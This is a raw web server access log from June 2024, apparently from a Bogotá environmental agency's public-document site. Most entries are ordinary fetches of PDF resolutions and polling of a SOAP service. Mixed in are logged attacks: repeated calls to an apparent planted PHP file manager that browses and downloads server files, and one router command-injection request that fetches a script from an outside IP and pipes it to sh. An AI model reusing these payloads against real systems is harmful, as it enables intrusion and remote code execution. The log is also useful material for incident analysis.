201.245.192.253 - - [16/Jun/2024:10:17:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.54.135 - - [16/Jun/2024:10:17:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages%5C&f=page96.swf&ft=download&white=1 HTTP/1.1" 200 24079
216.244.66.195 - - [16/Jun/2024:10:17:44 -0500] "GET /BLA/resoluciones/AUTOS%202016/1229.pdf HTTP/1.1" 200 331981
89.58.51.171 - - [16/Jun/2024:10:18:06 -0500] "GET /isolucionsda/FrameSetGeneral.asp?Pagina=BancoConocimiento.asp HTTP/1.1" 200 527
216.244.66.195 - - [16/Jun/2024:10:18:22 -0500] "GET /BLA/resoluciones/AUTOS%202016/1314.pdf HTTP/1.1" 200 430276
201.245.192.253 - - [16/Jun/2024:10:18:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
65.109.109.110 - - [16/Jun/2024:10:18:25 -0500] "GET /isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4%EF%82%B7 HTTP/1.1" 200 527
216.245.221.92 - - [16/Jun/2024:10:18:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:10:18:54 -0500] "GET /BLA/resoluciones/AUTOS%202007/1923.pdf HTTP/1.1" 200 87601
201.245.192.253 - - [16/Jun/2024:10:18:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34572
172.22.2.4 - - [16/Jun/2024:10:17:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:10:19:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:10:19:28 -0500] "GET /BLA/resoluciones/AUTOS%202010/0084.pdf HTTP/1.1" 200 156722
201.245.192.253 - - [16/Jun/2024:10:19:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34573
66.249.66.20 - - [16/Jun/2024:10:19:40 -0500] "GET /Publicaciones/2024EE63916.pdf HTTP/1.1" 404 227
216.244.66.195 - - [16/Jun/2024:10:19:56 -0500] "GET /BLA/resoluciones/AUTOS%202010/0149.pdf HTTP/1.1" 200 173025
172.22.2.4 - - [16/Jun/2024:10:18:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [16/Jun/2024:10:20:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:10:20:27 -0500] "GET /BLA/resoluciones/AUTOS%202010/0156.pdf HTTP/1.1" 200 180097
216.244.66.195 - - [16/Jun/2024:10:20:53 -0500] "GET /BLA/resoluciones/AUTOS%202010/1372.pdf HTTP/1.1" 200 296872
138.201.252.47 - - [16/Jun/2024:10:20:57 -0500] "GET /isolucionsda/FramesetArticulo.asp?Pagina=BancoConocimiento%2FG%2FGestiondelDefensordelCiudadano_v1%2FGestiondelDefensordelCiudadano_v1.asp&IdArticulo=4594 HTTP/1.1" 200 527
216.244.66.195 - - [16/Jun/2024:10:21:19 -0500] "GET /BLA/resoluciones/AUTOS%202010/1953.pdf HTTP/1.1" 200 139684
201.245.192.253 - - [16/Jun/2024:10:21:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
78.46.174.47 - - [16/Jun/2024:10:21:25 -0500] "GET /isolucionsda/Magazin.asp?Sigla=1049 HTTP/1.1" 404 3562
216.244.66.195 - - [16/Jun/2024:10:21:43 -0500] "GET /BLA/resoluciones/AUTOS%202010/2491.pdf HTTP/1.1" 200 223318
66.249.66.19 - - [16/Jun/2024:10:22:04 -0500] "GET /Publicaciones/2024EE67456.pdf HTTP/1.1" 404 227
216.244.66.195 - - [16/Jun/2024:10:22:11 -0500] "GET /BLA/resoluciones/AUTOS%202010/3134.pdf HTTP/1.1" 200 1088068
201.245.192.253 - - [16/Jun/2024:10:22:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
152.53.32.161 - - [16/Jun/2024:10:22:28 -0500] "GET /IsolucionSDA/Magazin.asp HTTP/1.1" 404 3562
201.245.192.253 - - [16/Jun/2024:10:22:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.123.196 - - [16/Jun/2024:10:21:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0741.pdf&ft=code&white=1 HTTP/1.1" 200 794326
216.244.66.195 - - [16/Jun/2024:10:23:02 -0500] "GET /BLA/resoluciones/AUTOS%202010/3310.pdf HTTP/1.1" 200 141636
66.249.66.21 - - [16/Jun/2024:10:23:04 -0500] "GET /Publicaciones/2024EE61587.pdf HTTP/1.1" 404 227
201.245.192.253 - - [16/Jun/2024:10:23:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:10:23:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:10:23:32 -0500] "GET /BLA/resoluciones/AUTOS%202010/4408.pdf HTTP/1.1" 200 80300
216.244.66.195 - - [16/Jun/2024:10:24:02 -0500] "GET /BLA/resoluciones/AUTOS%202010/4409.pdf HTTP/1.1" 200 55480
201.245.192.253 - - [16/Jun/2024:10:24:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:10:24:30 -0500] "GET /BLA/resoluciones/AUTOS%202010/5213.pdf HTTP/1.1" 200 156771
216.244.66.195 - - [16/Jun/2024:10:24:57 -0500] "GET /BLA/resoluciones/AUTOS%202010/5429.pdf HTTP/1.1" 200 1517323
66.249.66.19 - - [16/Jun/2024:10:24:59 -0500] "GET /Publicaciones/2024EE116147.pdf HTTP/1.1" 404 228
172.22.2.4 - - [16/Jun/2024:10:23:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:10:25:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:10:25:26 -0500] "GET /BLA/resoluciones/AUTOS%202010/5515.pdf HTTP/1.1" 200 1135782
172.22.2.4 - - [16/Jun/2024:10:24:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
47.128.17.126 - - [16/Jun/2024:10:26:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3272.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
216.244.66.195 - - [16/Jun/2024:10:26:09 -0500] "GET /BLA/resoluciones/AUTOS%202010/5644.pdf HTTP/1.1" 200 165580
201.245.192.253 - - [16/Jun/2024:10:26:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:10:26:39 -0500] "GET /BLA/resoluciones/AUTOS%202010/6104.pdf HTTP/1.1" 200 156825
201.245.192.253 - - [16/Jun/2024:10:26:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33522
201.245.192.253 - - [16/Jun/2024:10:26:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34573
216.244.66.195 - - [16/Jun/2024:10:27:09 -0500] "GET /BLA/resoluciones/AUTOS%202010/6644.pdf HTTP/1.1" 200 154907
201.245.192.253 - - [16/Jun/2024:10:27:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
78.46.174.47 - - [16/Jun/2024:10:27:27 -0500] "GET /isolucionsda/Magazin.asp?Sigla=1056 HTTP/1.1" 404 3562
201.245.192.253 - - [16/Jun/2024:10:27:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
173.252.107.1 - - [16/Jun/2024:10:28:19 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html HTTP/1.1" 200 1025
201.245.192.253 - - [16/Jun/2024:10:28:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [16/Jun/2024:10:28:27 -0500] "GET /BLA/resoluciones/AUTOS%202023/5492.pdf HTTP/1.1" 200 893094
216.245.221.92 - - [16/Jun/2024:10:28:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:10:29:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:10:28:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
201.245.192.253 - - [16/Jun/2024:10:29:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34573
47.128.99.16 - - [16/Jun/2024:10:30:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2742.pdf&ft=img&white=1 HTTP/1.1" 200 1621775
201.245.192.253 - - [16/Jun/2024:10:30:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
144.76.111.167 - - [16/Jun/2024:10:30:29 -0500] "GET /isolucionsda/FrameSetGeneral.asp?Pagina=BancoConocimiento/m/meci/meci.asp&IdModulo=16 HTTP/1.1" 200 6376
172.22.2.4 - - [16/Jun/2024:10:29:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:10:31:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:10:30:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
40.77.167.136 - - [16/Jun/2024:10:32:06 -0500] "GET /Publicaciones/2024EE69448.pdf HTTP/1.1" 200 591784
40.77.167.50 - - [16/Jun/2024:10:32:11 -0500] "GET /Publicaciones/2024EE121681.pdf HTTP/1.1" 200 241311
201.245.192.253 - - [16/Jun/2024:10:32:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:10:32:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:10:33:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:10:33:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:10:33:39 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:10:34:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.32.33 - - [16/Jun/2024:10:34:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+1991+DE+2006.PDF&ft=notepad HTTP/1.1" 200 10698
201.245.192.253 - - [16/Jun/2024:10:35:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
70.108.9.176 - - [16/Jun/2024:10:35:23 -0500] "GET /isolucionsda/bancoconocimiento/R/Resolucion2919del17deoctubrede2017/Resolucion2919del17deoctubrede2017.asp HTTP/1.1" 404 5024
201.245.192.253 - - [16/Jun/2024:10:36:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:10:35:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:10:36:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33522
201.245.192.253 - - [16/Jun/2024:10:36:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34573
201.245.192.253 - - [16/Jun/2024:10:37:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:10:37:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
172.22.2.4 - - [16/Jun/2024:10:36:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [16/Jun/2024:10:38:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:10:38:27 -0500] "HEAD / HTTP/1.1" 200 -
47.128.114.32 - - [16/Jun/2024:10:38:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=2200.pdf&ft=notepad HTTP/1.1" 200 35086
201.245.192.253 - - [16/Jun/2024:10:38:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34572
201.245.192.253 - - [16/Jun/2024:10:39:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:10:39:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34573
201.245.192.253 - - [16/Jun/2024:10:40:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
37.120.164.104 - - [16/Jun/2024:10:40:41 -0500] "GET /isolucionsda/FrameSetGeneral.asp?Pagina=BancoConocimiento/M/MECINuevo/MECINuevo.asp&IdModulo=16 HTTP/1.1" 200 6376
201.245.192.253 - - [16/Jun/2024:10:41:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
185.191.127.212 - - [16/Jun/2024:10:42:12 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:10:42:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:10:42:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
172.22.2.4 - - [16/Jun/2024:10:41:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.38.157 - - [16/Jun/2024:10:42:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=link.min.js&ft=download HTTP/1.1" 200 1646
201.245.192.253 - - [16/Jun/2024:10:43:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:10:43:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:10:41:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52783
201.245.192.253 - - [16/Jun/2024:10:44:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
95.217.9.35 - - [16/Jun/2024:10:44:26 -0500] "GET /isolucionsda/FramesetArticulo.asp?Pagina=bancoconocimiento%2FR%2FResolucion715de31demarzode2017%2FResolucion715de31demarzode2017.asp&IdArticulo=10934&Codigo=&Fecha=&Version=&Procedimiento=&cliente= HTTP/1.1" 200 8112
201.245.192.253 - - [16/Jun/2024:10:45:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:10:46:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
162.55.171.138 - - [16/Jun/2024:10:46:51 -0500] "GET / HTTP/1.1" 200 4720
47.128.16.218 - - [16/Jun/2024:10:46:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=menu-header.php&ft=notepad&white=1 HTTP/1.1" 200 8509
176.9.137.113 - - [16/Jun/2024:10:47:22 -0500] "GET /IsolucionSDA/FrameSetGeneral.asp HTTP/1.1" 200 6376
201.245.192.253 - - [16/Jun/2024:10:47:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:10:47:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
94.16.31.222 - - [16/Jun/2024:10:47:51 -0500] "GET /isolucionsda/Magazin.asp?Sigla=IRL HTTP/1.1" 404 3562
146.70.174.158 - - [16/Jun/2024:10:48:03 -0500] "GET /isolucionsda/FramesetArticulo.asp?Pagina=BancoConocimiento%2FA%2FAdministracionyserviciodelospuntosdeatencionalciudadano_v4%2FAdministracionyserviciodelospuntosdeatencionalciudadano_v4.asp&IdArticulo=2017 HTTP/1.1" 200 8174
138.201.252.47 - - [16/Jun/2024:10:48:06 -0500] "GET /isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4%EF%82%B7La HTTP/1.1" 200 6376
201.245.192.253 - - [16/Jun/2024:10:48:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:10:48:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:10:46:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [16/Jun/2024:10:48:41 -0500] "GET /BLA/resoluciones/AUTOS%202023/3370.pdf HTTP/1.1" 200 2932873
172.22.2.4 - - [16/Jun/2024:10:47:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53419
201.245.192.253 - - [16/Jun/2024:10:49:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:10:50:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.36.161 - - [16/Jun/2024:10:51:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6528.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
201.245.192.253 - - [16/Jun/2024:10:51:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:10:52:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:10:52:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:10:53:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:10:53:27 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.212 - - [16/Jun/2024:10:53:40 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
69.63.189.1 - - [16/Jun/2024:10:54:21 -0500] "GET /images/24%20de%20febrero%20Sendero%20guadalupe%202.jpeg HTTP/1.1" 200 70964
172.22.2.4 - - [16/Jun/2024:10:52:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:10:54:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [16/Jun/2024:10:55:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/0159.pdf HTTP/1.1" 200 388113
66.249.66.19 - - [16/Jun/2024:10:55:04 -0500] "GET /BLA/resoluciones/AUTOS%202023/0159.pdf HTTP/1.1" 200 388113
66.249.66.20 - - [16/Jun/2024:10:55:05 -0500] "GET /BLA/resoluciones/AUTOS%202023/3501.pdf HTTP/1.1" 200 394178
172.22.2.4 - - [16/Jun/2024:10:53:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59583
47.128.36.212 - - [16/Jun/2024:10:55:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages&f=align-left-2x.png&ft=download HTTP/1.1" 200 143
201.245.192.253 - - [16/Jun/2024:10:55:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
173.252.95.12 - - [16/Jun/2024:10:55:32 -0500] "GET /camino-guadalupe-aguanoso-abierto-de-nuevo-al-publico.html HTTP/1.1" 200 879
201.245.192.253 - - [16/Jun/2024:10:56:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
205.210.31.136 - - [16/Jun/2024:10:56:24 -0500] "GET / HTTP/1.1" 200 319
66.249.66.39 - - [16/Jun/2024:10:57:01 -0500] "GET /la-secretaria-de-ambiente-reconocera-los-techos-verdes-y-jardines-verticales-mas-destacados-de-bogota.html HTTP/1.1" 200 985
201.245.192.253 - - [16/Jun/2024:10:57:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:10:57:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
144.76.111.167 - - [16/Jun/2024:10:58:10 -0500] "GET /IsolucionSDA/Encabezado.asp HTTP/1.1" 200 11400
201.245.192.253 - - [16/Jun/2024:10:58:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:10:58:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:10:59:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.38.207 - - [16/Jun/2024:10:59:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp&f=ibAB5C.tmp&ft=download HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:10:58:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:11:00:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:11:00:51 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2002%20del%2019%20de%20Abril%20de%202016.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2024:10:59:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [16/Jun/2024:11:01:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
138.201.252.47 - - [16/Jun/2024:11:01:31 -0500] "GET /IsolucionSDA/Content/toastr.css HTTP/1.1" 200 7184
201.245.192.253 - - [16/Jun/2024:11:02:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:11:02:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
168.119.110.134 - - [16/Jun/2024:11:02:53 -0500] "GET /IsolucionSDA/Scripts/customRequired/relativePath.js HTTP/1.1" 404 3616
216.244.66.195 - - [16/Jun/2024:11:03:13 -0500] "GET /BLA/resoluciones/AUTOS%202016/0078.pdf HTTP/1.1" 200 613743
201.245.192.253 - - [16/Jun/2024:11:03:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:11:03:27 -0500] "HEAD / HTTP/1.1" 200 -
65.109.109.110 - - [16/Jun/2024:11:03:27 -0500] "GET /IsolucionSDA/Content/themes/custom/jquery-ui.css HTTP/1.1" 200 34502
47.128.27.42 - - [16/Jun/2024:11:03:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0324.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
216.244.66.195 - - [16/Jun/2024:11:03:52 -0500] "GET /BLA/resoluciones/AUTOS%202016/0119.pdf HTTP/1.1" 200 371184
201.245.192.253 - - [16/Jun/2024:11:04:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:11:04:23 -0500] "GET /BLA/resoluciones/AUTOS%202016/0423.pdf HTTP/1.1" 200 809285
216.244.66.195 - - [16/Jun/2024:11:05:10 -0500] "GET /BLA/resoluciones/AUTOS%202016/0536.pdf HTTP/1.1" 200 722606
201.245.192.253 - - [16/Jun/2024:11:05:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:11:05:56 -0500] "GET /BLA/resoluciones/AUTOS%202016/0675.pdf HTTP/1.1" 200 552090
172.22.2.4 - - [16/Jun/2024:11:04:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:11:06:13 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1018
52.167.144.212 - - [16/Jun/2024:11:06:15 -0500] "GET /Publicaciones/2024EE00159.pdf HTTP/1.1" 404 227
201.245.192.253 - - [16/Jun/2024:11:06:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:11:06:28 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [16/Jun/2024:11:06:28 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
216.244.66.195 - - [16/Jun/2024:11:06:31 -0500] "GET /BLA/resoluciones/AUTOS%202016/1317.pdf HTTP/1.1" 200 347262
172.22.2.4 - - [16/Jun/2024:11:06:51 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=73&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 9925
172.22.2.4 - - [16/Jun/2024:11:06:52 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:11:05:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55823
191.156.236.214 - - [16/Jun/2024:11:06:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0073.pdf HTTP/1.1" 200 412643
172.22.2.4 - - [16/Jun/2024:11:06:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.244.66.195 - - [16/Jun/2024:11:07:06 -0500] "GET /BLA/resoluciones/AUTOS%202016/1574.pdf HTTP/1.1" 200 340626
201.245.192.253 - - [16/Jun/2024:11:07:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:11:07:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
52.167.144.230 - - [16/Jun/2024:11:07:34 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 14105
94.16.31.222 - - [16/Jun/2024:11:07:41 -0500] "GET /IsolucionSDA/bancoconocimiento/R/Resolucion801del27dejuniode2016/Resolucion801del27dejuniode2016.asp HTTP/1.1" 404 5012
216.244.66.195 - - [16/Jun/2024:11:07:45 -0500] "GET /BLA/resoluciones/AUTOS%202016/2230.pdf HTTP/1.1" 200 523077
47.128.98.134 - - [16/Jun/2024:11:07:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4777.pdf&ft=notepad&white=1 HTTP/1.1" 200 343753
201.245.192.253 - - [16/Jun/2024:11:08:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
135.125.237.198 - - [16/Jun/2024:11:08:27 -0500] "GET /isolucionsda/bancoconocimiento/R/Resolucion2714deOctubre4de2017/Resolucion2714deOctubre4de2017.asp HTTP/1.1" 404 5008
216.245.221.92 - - [16/Jun/2024:11:08:27 -0500] "HEAD / HTTP/1.1" 200 -
65.21.136.254 - - [16/Jun/2024:11:08:28 -0500] "GET /IsolucionSDA/FramesetArticulo.asp?Pagina=bancoconocimiento%2FP%2FProgramadegestiondocumental2016-2019%2FProgramadegestiondocumental2016-2019.asp&IdArticulo=11124&Codigo=&Fecha=&Version=&Procedimiento=&cliente= HTTP/1.1" 200 8136
216.244.66.195 - - [16/Jun/2024:11:08:28 -0500] "GET /BLA/resoluciones/AUTOS%202016/2278.pdf HTTP/1.1" 200 466524
66.249.66.19 - - [16/Jun/2024:11:09:09 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20T-299%20DE%202008.doc HTTP/1.1" 304 -
66.249.66.21 - - [16/Jun/2024:11:09:10 -0500] "GET /Publicaciones/2024EE116147.pdf HTTP/1.1" 404 228
216.244.66.195 - - [16/Jun/2024:11:09:12 -0500] "GET /BLA/resoluciones/AUTOS%202016/2537.pdf HTTP/1.1" 200 393260
